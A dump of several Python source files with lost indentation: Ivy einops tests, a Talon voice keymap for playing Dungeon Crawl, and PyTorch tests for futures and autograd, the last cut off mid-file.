# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
|
crawl.py
|
from talon.voice import Context, Key, Rep, Str, press
ctx = Context('crawl', bundle='com.apple.Terminal', func=lambda app, win: 'crawl' in win.title)
import time
import threading
import string
from .std import alpha_alt
# alpha = {k: k for k in string.lowercase}
alpha = {}
alpha.update(dict(zip(alpha_alt, string.ascii_lowercase)))
alpha.update({'sky %s' % word: letter for word, letter in zip(alpha_alt, string.ascii_uppercase)})
alpha.update({'level %d' % k: str(k) for k in range(1, 30)})
# TODO: numbers are used for dungeon levels
# TODO: repeat numbers should change based on whether it was the same phrase?
# TODO: I don't want to put parens around top-level ORs
# TODO: ["next song", "roam"] should work.
# TODO: better debug
def Text(m):
Str(' '.join(map(str, m.dgndictation[0]._words)))(None)
keymap = {}
keymap.update(alpha)
keymap.update({
'(right hand | right angle | rangle)': '>',
'(left hand | left angle | leangle)': '<',
'minus': '-',
'plus': '+',
'bang': '!',
'dollar': '$',
'underscore': '_',
'up': 'k',
'down': 'j',
'left': 'h',
'right': 'l',
'upple': 'y',
'downle': 'b',
'upper': 'u',
'downer': 'n',
'way up': 'K',
'way down': 'J',
'way left': 'H',
'way right': 'L',
'way upple': 'U',
'way downle': 'B',
'way upper': 'U',
'way downer': 'N',
'(escape | back)': Key('esc'),
'(enter | shock | ok)': Key('enter'),
'tarp': Key('tab'),
'(question mark | question | questo)': '?',
'(star | asterisk)': '*',
'(dot | period)': '.',
'(wander | explore | roam)': 'o',
'(rest | sleep)': '5',
'wait': '.',
'(inventory | invent)': 'i',
'auto': Key('tab'),
'fight': Key(' '.join(['tab'] * 10)),
'stand [and] fight': Key(' '.join(['shift-tab'] * 10)),
'eat [food]': 'e',
'(quaff | drink)': 'q',
'quiver': 'Q',
'reed': 'r',
'skills': 'm',
'(stats | attributes | (char | character) sheet)': '%',
'(god | piety | religion)': '^',
'pray': '>',
'speed': '@',
'shopping list': '$',
'cast': 'z',
'cast last': Key('z . enter'), 'recast': Key('z . enter'),
'cast (one | a)': 'za',
'cast (two | b)': 'zb',
'cast (three | c)': 'zc',
'cast (four | d)': 'zd',
'cast (five | e)': 'ze',
'cast (six | f)': 'zf',
'cast (seven | g)': 'zg',
'cast (eight | h)': 'zh',
'autocast one': Key('z a enter'),
'autocast two': Key('z b enter'),
'autocast three': Key('z c enter'),
'autocast four': Key('z d enter'),
'autocast five': Key('z e enter'),
'autocast six': Key('z f enter'),
'autocast seven': Key('z g enter'),
'autocast eight': Key('z h enter'),
'ability': 'a',
'(mutations | innate abilities)': 'A',
'talk': 't',
'shout': 'tt',
'wear': 'W',
'wield': 'w',
'switch weapon': '\'',
'(memorize | memo)': 'M',
'put on': 'P',
'take off': 'T',
'remove': 'R',
'drop': 'd',
# need a rule for letter, as well as this templated string form
# also, rule functions might need to be passed the entire context, or the chain of contexts that led to them
# 'drop <letter>': 'd {letter}',
'evoke': 'V',
'(evoke weapon | reach)': 'v',
'fire': 'f',
'(fire invent | fire inventory | fire item)': 'F',
'open': 'O',
'close': 'C',
'messages': Key('ctrl-p'),
'look down': ';',
'examine': 'x',
'map': 'X',
'visible [(items | features)]': Key('ctrl-x'),
'(get | grab | pick up)': 'g',
'find': Key('ctrl-f'),
'find plate': Key('ctrl-f p l a t e enter'),
'find armour': Key('ctrl-f a r m o u r enter'),
'find blade': Key('ctrl-f b l a d e enter'),
'find sword': Key('ctrl-f s w o r d enter'),
'find dagger': Key('ctrl-f d a g g e r enter'),
'find axe': Key('ctrl-f a x e enter'),
'find altar': Key('ctrl-f a l t a r enter'),
'find artifact': Key('ctrl-f a r t i f enter'),
'find brand': Key('ctrl-f b r a n d enter'),
'find corpse': Key('ctrl-f c o r p s e enter'),
'type <dgndictation>': Text,
'travel': 'G',
'travel [to] dungeon': 'Gd',
'travel [to] temple': 'Gt',
'travel [to] [(orc | orcish)] mines': 'Go',
'travel [to] lair': 'Gl',
'travel [to] swamp': 'Gs',
'travel [to] (spider nest | spider | nest)': 'Gn',
'travel [to] (slime pits | slime | pits)': 'Gm',
'travel [to] (elven halls | elven | halls)': 'Ge',
'travel [to] vaults': 'Gv',
'travel [to] depths': 'Gu',
'deepest': '$',
'down stairs': '>',
'up stairs': '<',
'yes': 'Y',
'no': 'N',
'(cut | chop)': 'c',
'all': 'a',
'edible': 'e',
'choosy': 'c',
'(adjust | rename)': '=',
'items': 'i',
'spells': 's',
'abilities': 'a',
'autopickup': Key('ctrl-a'),
'item knowledge': '\\',
# 'twice': Rep(1),
# 'thrice': Rep(2),
# 'times four': Rep(3),
# 'times five': Rep(4),
# 'times six': Rep(5),
# 'ten': Rep(9),
'(str | strength)': 's',
'(int | intel | intelligence)': 'i',
'(dex | dexterity)': 'd',
})
keymap.update({str(k): Rep(k - 1) for k in range(2, 11)})
'''
stepping = False
def stepthread():
global stepping
while stepping:
press('f6')
time.sleep(1)
def slowstep(j):
global stepping
stepping = True
threading.Thread(target=stepthread).start()
def stopstep(j):
global stepping
if stepping:
stepping = False
else:
press('esc')
keymap.update({
'slow step': slowstep,
'halt': stopstep,
})
'''
ctx.keymap(keymap)
|
test_futures.py
|
import threading
import time
import torch
from torch.futures import Future
from torch.testing._internal.common_utils import TestCase, TemporaryFileName
def add_one(fut):
return fut.wait() + 1
class TestFuture(TestCase):
def test_wait(self):
f = Future()
f.set_result(torch.ones(2, 2))
self.assertEqual(f.wait(), torch.ones(2, 2))
def test_wait_multi_thread(self):
def slow_set_future(fut, value):
time.sleep(0.5)
fut.set_result(value)
f = Future()
t = threading.Thread(target=slow_set_future, args=(f, torch.ones(2, 2)))
t.start()
self.assertEqual(f.wait(), torch.ones(2, 2))
t.join()
def test_mark_future_twice(self):
fut = Future()
fut.set_result(1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
def test_pickle_future(self):
fut = Future()
errMsg = "Can not pickle torch.futures.Future"
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
torch.save(fut, fname)
def test_then(self):
fut = Future()
then_fut = fut.then(lambda x: x.wait() + 1)
fut.set_result(torch.ones(2, 2))
self.assertEqual(fut.wait(), torch.ones(2, 2))
self.assertEqual(then_fut.wait(), torch.ones(2, 2) + 1)
def test_chained_then(self):
fut = Future()
futs = []
last_fut = fut
for _ in range(20):
last_fut = last_fut.then(add_one)
futs.append(last_fut)
fut.set_result(torch.ones(2, 2))
for i in range(len(futs)):
self.assertEqual(futs[i].wait(), torch.ones(2, 2) + i + 1)
def _test_error(self, cb, errMsg):
fut = Future()
then_fut = fut.then(cb)
fut.set_result(5)
self.assertEqual(5, fut.wait())
with self.assertRaisesRegex(RuntimeError, errMsg):
then_fut.wait()
def test_then_wrong_arg(self):
def wrong_arg(tensor):
return tensor + 1
self._test_error(wrong_arg, "unsupported operand type.*Future.*int")
def test_then_no_arg(self):
def no_arg():
return True
self._test_error(no_arg, "takes 0 positional arguments but 1 was given")
def test_then_raise(self):
def raise_value_error(fut):
raise ValueError("Expected error")
self._test_error(raise_value_error, "Expected error")
def test_collect_all(self):
fut1 = Future()
fut2 = Future()
fut_all = torch.futures.collect_all([fut1, fut2])
def slow_in_thread(fut, value):
time.sleep(0.1)
fut.set_result(value)
t = threading.Thread(target=slow_in_thread, args=(fut1, 1))
fut2.set_result(2)
t.start()
res = fut_all.wait()
self.assertEqual(res[0].wait(), 1)
self.assertEqual(res[1].wait(), 2)
t.join()
def test_wait_all(self):
fut1 = Future()
fut2 = Future()
# No error version
fut1.set_result(1)
fut2.set_result(2)
res = torch.futures.wait_all([fut1, fut2])
print(res)
self.assertEqual(res, [1, 2])
# Version with an exception
def raise_in_fut(fut):
raise ValueError("Expected error")
fut3 = fut1.then(raise_in_fut)
with self.assertRaisesRegex(RuntimeError, "Expected error"):
torch.futures.wait_all([fut3, fut2])
|
test_autograd.py
|
import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
